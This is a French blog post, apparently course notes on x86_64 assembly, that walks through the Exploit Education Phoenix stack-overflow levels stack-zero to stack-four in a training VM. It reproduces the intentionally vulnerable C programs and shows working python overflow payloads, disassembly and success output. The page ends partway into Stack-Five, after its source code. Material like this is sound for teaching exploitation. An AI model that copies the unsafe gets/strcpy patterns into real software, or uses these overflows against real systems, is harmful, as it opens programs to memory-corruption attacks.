<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
  </script><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Tape3 | Assembleur x86_64 (En travaux)</title>
<meta name="generator" content="Jekyll v4.3.3" />
<meta property="og:title" content="Tape3" />
<meta name="author" content="S-Mazigh" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Mise en route Télécharger la vm amd64 ici, qemu aussi si vous ne l’avez pas, debian, arch. Lancez le script boot-exploit-education-phoenix-amd64.sh. Utilisez le login user et le mot de passe user. Faite ssh -p2222 user@localhost dans un autre terminal pour avoir une meilleure expérience." />
<meta property="og:description" content="Mise en route Télécharger la vm amd64 ici, qemu aussi si vous ne l’avez pas, debian, arch. Lancez le script boot-exploit-education-phoenix-amd64.sh. Utilisez le login user et le mot de passe user. Faite ssh -p2222 user@localhost dans un autre terminal pour avoir une meilleure expérience." />
<link rel="canonical" href="https://s-mazigh.github.io/ASMx86_64/2024/01/23/phoenix.html" />
<meta property="og:url" content="https://s-mazigh.github.io/ASMx86_64/2024/01/23/phoenix.html" />
<meta property="og:site_name" content="Assembleur x86_64 (En travaux)" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-01-23T00:00:00+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Tape3" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"S-Mazigh"},"dateModified":"2024-01-23T00:00:00+01:00","datePublished":"2024-01-23T00:00:00+01:00","description":"Mise en route Télécharger la vm amd64 ici, qemu aussi si vous ne l’avez pas, debian, arch. Lancez le script boot-exploit-education-phoenix-amd64.sh. Utilisez le login user et le mot de passe user. Faite ssh -p2222 user@localhost dans un autre terminal pour avoir une meilleure expérience.","headline":"Tape3","mainEntityOfPage":{"@type":"WebPage","@id":"https://s-mazigh.github.io/ASMx86_64/2024/01/23/phoenix.html"},"url":"https://s-mazigh.github.io/ASMx86_64/2024/01/23/phoenix.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href=https://s-mazigh.github.io/ASMx86_64/assets/css/style.css><link type="application/atom+xml" rel="alternate" href="https://s-mazigh.github.io/ASMx86_64/feed.xml" title="Assembleur x86_64 (En travaux)" />
</head><body><header class="site-header">

  <div class="wrapper"><a class="site-title" rel="author" href="https://s-mazigh.github.io/ASMx86_64">Assembleur x86_64 (En travaux)</a><nav class="site-nav">
      <input type="checkbox" id="nav-trigger" class="nav-trigger" />
      <label for="nav-trigger">
        <span class="menu-icon">
          <svg viewBox="0 0 18 15" width="18px" height="15px">
            <path
              d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z" />
          </svg>
        </span>
      </label>

      <div class="trigger"></div>
    </nav></div>
</header><main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

    <script>
        let tocShown = false;
        /* Set the width of the side navigation to 250px */
        function toggleToc() {
            if (!tocShown) {
                document.getElementById("side-bar").style.width = "240px";
                document.getElementById("post-content").style.marginLeft = "250px";
                // document.getElementById("togglebtn").innerHTML = "&lt";
            } else {
                document.getElementById("side-bar").style.width = "0";
                document.getElementById("post-content").style.marginLeft = "0px";
                // document.getElementById("togglebtn").innerHTML = "&gt";
            }
            tocShown = !tocShown;
        }

    </script>

    <header class="post-header">
        <h1 class="post-title p-name" itemprop="name headline">Tape3</h1>
        <p class="post-meta"><time class="dt-published" datetime="2024-01-23T00:00:00+01:00" itemprop="datePublished">
                Jan 23, 2024
            </time></p>
    </header>
    <div class="post-container">
        <div class="side-bar" id="side-bar">
            <a id="togglebtn" onclick="toggleToc()">TOC</a>
            <ul class="toc"><li class="title-2"><a href="#mise-en-route">Mise en route</a></li><li class="title-2"><a href="#notes-importantes">Notes importantes</a><ul><li class="title-3"><a href="#rappel-gdb">Rappel gdb</a></li></ul></li><li class="title-2"><a href="#stack-zero">Stack-zero</a></li><li class="title-2"><a href="#stack-one">Stack-one</a></li><li class="title-2"><a href="#stack-two">Stack-Two</a></li><li class="title-2"><a href="#stack-three">Stack-Three</a></li><li class="title-2"><a href="#stack-four">Stack-Four</a></li><li class="title-2"><a href="#stack-five">Stack-Five</a></li></ul>
        </div>

        <div class="post-content e-content" id="post-content" itemprop="articleBody">
            <h2 id="mise-en-route">Mise en route</h2>
<ul>
  <li>Télécharger la vm amd64 <a href="https://exploit.education/downloads/">ici</a>, qemu aussi si vous ne l’avez pas, <a href="https://www.tecmint.com/install-qemu-kvm-ubuntu-create-virtual-machines/">debian</a>, <a href="https://www.howtoforge.com/how-to-install-kvm-qemu-on-manjaro-archlinux/]">arch</a>.</li>
  <li>Lancez le script <code class="language-plaintext highlighter-rouge">boot-exploit-education-phoenix-amd64.sh</code>.</li>
  <li>Utilisez le login <code class="language-plaintext highlighter-rouge">user</code> et le mot de passe <code class="language-plaintext highlighter-rouge">user</code>.</li>
  <li>Faite <code class="language-plaintext highlighter-rouge">ssh -p2222 user@localhost</code> dans un autre <strong>terminal</strong> pour avoir une meilleure expérience.</li>
</ul>

<h2 id="notes-importantes">Notes importantes</h2>
<ul>
  <li><code class="language-plaintext highlighter-rouge">volatile</code> est pour forcer le compilateur à ne pas optimiser la variable, et de toujours la mettre à jour en mémoire.</li>
  <li><code class="language-plaintext highlighter-rouge">"\x"</code> permet d’écrire des chaines de caractères en utilisant des hexadicimaux: <code class="language-plaintext highlighter-rouge">"\x30\x30" == "00"</code>.</li>
  <li>Une variable en bash ne peut pas stocker le caractère <code class="language-plaintext highlighter-rouge">'\x00'</code> (Stack-Five et Stack-Six).</li>
</ul>

<h3 id="rappel-gdb">Rappel gdb</h3>
<ul>
  <li>La VM utilise <strong>gef</strong> (gdb enhanced features) pour faciliter l’utilisation de gdb.</li>
  <li><code class="language-plaintext highlighter-rouge">start</code> est l’équivalent de <code class="language-plaintext highlighter-rouge">run</code> avec un breakpoint sur <code class="language-plaintext highlighter-rouge">main()</code>. Vu que le binaire ne contient pas assez de symboles pour le débugage, on ne peut faire des breakpoint que sur des adresses.
    <ul>
      <li>gef permet d’utiliser une syntaxe plus simple avec le nom de la fonction, ex: <code class="language-plaintext highlighter-rouge">b *start_level</code>.</li>
      <li>Ne pas oublier l’astérisque avant l’adresse pour les breakpoints!!</li>
    </ul>
  </li>
  <li>Pour donner un input au programme sur gdb on utilise la syntaxe <code class="language-plaintext highlighter-rouge">start&lt; &lt;(echo -ne "Hello")</code>, on peut utiliser <code class="language-plaintext highlighter-rouge">run</code> à la place pour ne pas s’arrêter au <code class="language-plaintext highlighter-rouge">main()</code>.</li>
  <li>On peut avoir l’assembleur d’une fonction en utilisant la commande <code class="language-plaintext highlighter-rouge">disassemble</code>, exemple: <code class="language-plaintext highlighter-rouge">disassemble start_level</code> donnera le même code assembleur de la fonction <code class="language-plaintext highlighter-rouge">start_level</code>. C’est plus pratique sur la VM vu que <code class="language-plaintext highlighter-rouge">objdump --disassemble=start_level</code> n’est pas supporté par cette dernière.</li>
</ul>

<h2 id="stack-zero">Stack-zero</h2>

<ul>
  <li>Le code:</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="cp">#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"
</span>
<span class="kt">char</span> <span class="o">*</span><span class="nf">gets</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">);</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">struct</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
    <span class="k">volatile</span> <span class="kt">int</span> <span class="n">changeme</span><span class="p">;</span>
  <span class="p">}</span> <span class="n">locals</span><span class="p">;</span>

  <span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">BANNER</span><span class="p">);</span>

  <span class="n">locals</span><span class="p">.</span><span class="n">changeme</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">gets</span><span class="p">(</span><span class="n">locals</span><span class="p">.</span><span class="n">buffer</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">locals</span><span class="p">.</span><span class="n">changeme</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">"Well done, the 'changeme' variable has been changed!"</span><span class="p">);</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span>
        <span class="s">"Uh oh, 'changeme' has not yet been changed. Would you like to try "</span>
        <span class="s">"again?"</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>Le fait de déclarer <code class="language-plaintext highlighter-rouge">buffer</code> et <code class="language-plaintext highlighter-rouge">changeme</code> dans une struct, permet d’être sûr que les 64 caractères de <code class="language-plaintext highlighter-rouge">buffer</code> précèderont l’entier <code class="language-plaintext highlighter-rouge">changeme</code>.</li>
  <li>Ajoutant à cela le fait que l’implémentation <code class="language-plaintext highlighter-rouge">gets</code> simpliste permet d’écrire autant d’octets qu’on veut (segfault si elle arrive à une adresse interdite).</li>
  <li>Ainsi, en écrivant plus de 64 octets, on va modifier la valeur de <code class="language-plaintext highlighter-rouge">changeme</code>.</li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span>python <span class="nt">-c</span> <span class="s1">'print("E"*64+"\x10\x20\x30\40")'</span> | /opt/phoenix/amd64/stack-zero 
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Well done, the 'changeme' variable has been changed!
</code></pre></div></div>

<center><div class="figure-container-small">
<figure class="figure"> 
<img src="https://s-mazigh.github.io/ASMx86_64/assets/images/phoenix/stack-zero.png" />
</figure>
<figcaption>Disposition de la structure en mémoire.</figcaption>
</div></center>

<blockquote>
  <p>Remarquez que la valeur de <strong>changme</strong> est inversée, vu qu’on écrit depuis l’adresse basse à l’adresse haute, et que l’architecture amd64 suit le schéma <strong>little-endian</strong>.</p>
</blockquote>

<h2 id="stack-one">Stack-one</h2>

<ul>
  <li>Le code:</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="cp">#include</span> <span class="cpf">&lt;err.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="cp">#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">struct</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
    <span class="k">volatile</span> <span class="kt">int</span> <span class="n">changeme</span><span class="p">;</span>
  <span class="p">}</span> <span class="n">locals</span><span class="p">;</span>

  <span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">BANNER</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">&lt;</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"specify an argument, to be copied into the </span><span class="se">\"</span><span class="s">buffer</span><span class="se">\"</span><span class="s">"</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="n">locals</span><span class="p">.</span><span class="n">changeme</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">strcpy</span><span class="p">(</span><span class="n">locals</span><span class="p">.</span><span class="n">buffer</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">locals</span><span class="p">.</span><span class="n">changeme</span> <span class="o">==</span> <span class="mh">0x496c5962</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">"Well done, you have successfully set changeme to the correct value"</span><span class="p">);</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Getting closer! changeme is currently 0x%08x, we want 0x496c5962</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
        <span class="n">locals</span><span class="p">.</span><span class="n">changeme</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>On a toujours la même struct, mais ici on doit passer l’argument <code class="language-plaintext highlighter-rouge">argv[1]</code> et faire en sorte d’avoir une valeur spécifique pour <code class="language-plaintext highlighter-rouge">changeme</code>.
    <ul>
      <li>La fonction <code class="language-plaintext highlighter-rouge">strcpy</code> est tout aussi naïve que <code class="language-plaintext highlighter-rouge">gets</code>, elle ne s’arrête qu’au caractère <code class="language-plaintext highlighter-rouge">0x00</code> contrairement à <code class="language-plaintext highlighter-rouge">strncpy</code> qui accepte un troisième argument représentant le nombre de caractères à copier.</li>
    </ul>
  </li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span>/opt/phoenix/amd64/stack-one <span class="si">$(</span> python <span class="nt">-c</span> <span class="s1">'print("E"*64+"\x62\x59\x6c\x49")'</span><span class="si">)</span>
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value
</code></pre></div></div>

<h2 id="stack-two">Stack-Two</h2>

<ul>
  <li>Le code:</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;err.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="cp">#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">struct</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
    <span class="k">volatile</span> <span class="kt">int</span> <span class="n">changeme</span><span class="p">;</span>
  <span class="p">}</span> <span class="n">locals</span><span class="p">;</span>

  <span class="kt">char</span> <span class="o">*</span><span class="n">ptr</span><span class="p">;</span>

  <span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">BANNER</span><span class="p">);</span>

  <span class="n">ptr</span> <span class="o">=</span> <span class="n">getenv</span><span class="p">(</span><span class="s">"ExploitEducation"</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">ptr</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">errx</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">"please set the ExploitEducation environment variable"</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="n">locals</span><span class="p">.</span><span class="n">changeme</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">strcpy</span><span class="p">(</span><span class="n">locals</span><span class="p">.</span><span class="n">buffer</span><span class="p">,</span> <span class="n">ptr</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">locals</span><span class="p">.</span><span class="n">changeme</span> <span class="o">==</span> <span class="mh">0x0d0a090a</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">"Well done, you have successfully set changeme to the correct value"</span><span class="p">);</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Almost! changeme is currently 0x%08x, we want 0x0d0a090a</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
        <span class="n">locals</span><span class="p">.</span><span class="n">changeme</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>Même idée que stack-one, on a juste à exporter la variable d’environnement <code class="language-plaintext highlighter-rouge">ExploitEducation</code> avec la chaine de caractères nécessaire.</li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span><span class="nb">export </span><span class="nv">ExploitEducation</span><span class="o">=</span><span class="si">$(</span> python <span class="nt">-c</span> <span class="s1">'print("E"*64+"\x0a\x09\x0a\x0d")'</span><span class="si">)</span>  
user@phoenix-amd64:~<span class="nv">$ </span>/opt/phoenix/amd64/stack-two 
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to phoenix/stack-two, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value
</code></pre></div></div>

<h2 id="stack-three">Stack-Three</h2>

<ul>
  <li>Le code:</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;err.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="cp">#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"
</span>
<span class="kt">char</span> <span class="o">*</span><span class="nf">gets</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">);</span>

<span class="kt">void</span> <span class="nf">complete_level</span><span class="p">()</span> <span class="p">{</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Congratulations, you've finished "</span> <span class="n">LEVELNAME</span> <span class="s">" :-) Well done!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
  <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">struct</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
    <span class="k">volatile</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">fp</span><span class="p">)();</span>
  <span class="p">}</span> <span class="n">locals</span><span class="p">;</span>

  <span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">BANNER</span><span class="p">);</span>

  <span class="n">locals</span><span class="p">.</span><span class="n">fp</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
  <span class="n">gets</span><span class="p">(</span><span class="n">locals</span><span class="p">.</span><span class="n">buffer</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">locals</span><span class="p">.</span><span class="n">fp</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"calling function pointer @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">locals</span><span class="p">.</span><span class="n">fp</span><span class="p">);</span>
    <span class="n">fflush</span><span class="p">(</span><span class="n">stdout</span><span class="p">);</span>
    <span class="n">locals</span><span class="p">.</span><span class="n">fp</span><span class="p">();</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"function pointer remains unmodified :~( better luck next time!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>C’est toujours la même histoire, mais ici, on doit écrire <strong>8 octets</strong> correspondant à l’adresse de la fonction <code class="language-plaintext highlighter-rouge">complete_level()</code>.</li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span>nm /opt/phoenix/amd64/stack-three
...
000000000040069d T complete_level
...
</code></pre></div></div>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span>python <span class="nt">-c</span> <span class="s1">'print("E"*64+"\x9d\x06\x40\x00\x00\x00\x00\x00")'</span> | /opt/phoenix/amd64/stack-three
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!
</code></pre></div></div>

<h2 id="stack-four">Stack-Four</h2>

<ul>
  <li>Le code:</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;err.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="cp">#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"
</span>
<span class="kt">char</span> <span class="o">*</span><span class="nf">gets</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">);</span>

<span class="kt">void</span> <span class="nf">complete_level</span><span class="p">()</span> <span class="p">{</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Congratulations, you've finished "</span> <span class="n">LEVELNAME</span> <span class="s">" :-) Well done!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
  <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">start_level</span><span class="p">()</span> <span class="p">{</span>
  <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
  <span class="kt">void</span> <span class="o">*</span><span class="n">ret</span><span class="p">;</span>

  <span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>

  <span class="n">ret</span> <span class="o">=</span> <span class="n">__builtin_return_address</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"and will be returning to %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">BANNER</span><span class="p">);</span>
  <span class="n">start_level</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>On n’a plus la struct, autrement dit le compilateur peut choisir l’ordre qui lui va.</li>
  <li>Maintenant, on doit réécrire l’adresse de retour <code class="language-plaintext highlighter-rouge">push</code> par l’instruction <code class="language-plaintext highlighter-rouge">call start_level()</code> pour <strong>retourner</strong> vers <code class="language-plaintext highlighter-rouge">complete_level()</code> au lieu de <code class="language-plaintext highlighter-rouge">main()</code>.</li>
  <li>Sachant que la pile doit être alignée sur 16 et que le compilateur peut sauvegarder des registres dans la pile, on ne peut pas calculer directement le nombre d’octets nécessaires sans voir le code assembleur.</li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span>objdump <span class="nt">--disassemble</span> /opt/phoenix/amd64/stack-four 
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000000000400635 &lt;start_level&gt;:
  400635:	55                   	push   %rbp
  400636:	48 89 e5             	mov    %rsp,%rbp
  400639:	48 83 ec 50          	sub    $0x50,%rsp 
  40063d:	48 8d 45 b0          	lea    -0x50(%rbp),%rax
  400641:	48 89 c7             	mov    %rax,%rdi
  400644:	e8 27 fe ff ff       	callq  400470 &lt;gets@plt&gt;
  400649:	48 8b 45 08          	mov    0x8(%rbp),%rax
  40064d:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
  400651:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
  400655:	48 89 c6             	mov    %rax,%rsi
  400658:	bf 33 07 40 00       	mov    $0x400733,%edi
  40065d:	b8 00 00 00 00       	mov    $0x0,%eax
  400662:	e8 f9 fd ff ff       	callq  400460 &lt;printf@plt&gt;
  400667:	90                   	nop
  400668:	c9                   	leaveq 
  400669:	c3                   	retq   
</code></pre></div></div>

<ul>
  <li>On voit que <code class="language-plaintext highlighter-rouge">%rbp</code> fut push dans la pile.</li>
  <li>L’instruction <code class="language-plaintext highlighter-rouge">sub</code> nous dit que <strong>0x50=80</strong> octets furent alloués. Et la préparation de l’appel à <code class="language-plaintext highlighter-rouge">gets(buffer);</code> nous permet de savoir que notre buffer commence au sommet de la pile (l’adresse la plus basse).</li>
  <li>Pour ainsi dire, on doit écrire <strong>80+8</strong> octets avant d’arriver à l’adresse de retour.</li>
</ul>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span>nm /opt/phoenix/amd64/stack-four  
...
000000000040061d T complete_level
...
</code></pre></div></div>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@phoenix-amd64:~<span class="nv">$ </span>python <span class="nt">-c</span> <span class="s1">'print("E"*88+"\x1d\x06\x40\x00\x00\x00\x00\x00")'</span> | /opt/phoenix/amd64/stack-four 
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to phoenix/stack-four, brought to you by https://exploit.education
and will be returning to 0x40061d
Congratulations, you've finished phoenix/stack-four :-) Well done!
</code></pre></div></div>

<h2 id="stack-five">Stack-Five</h2>

<ul>
  <li>Le code:</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="cp">#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"
</span>
<span class="kt">char</span> <span class="o">*</span><span class="nf">gets</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">);</span>

<span class="kt">void</span> <span class="nf">start_level</span><span class="p">()</span> <span class="p">{</span>
  <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
  <span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span>
<span class="p">}</span>

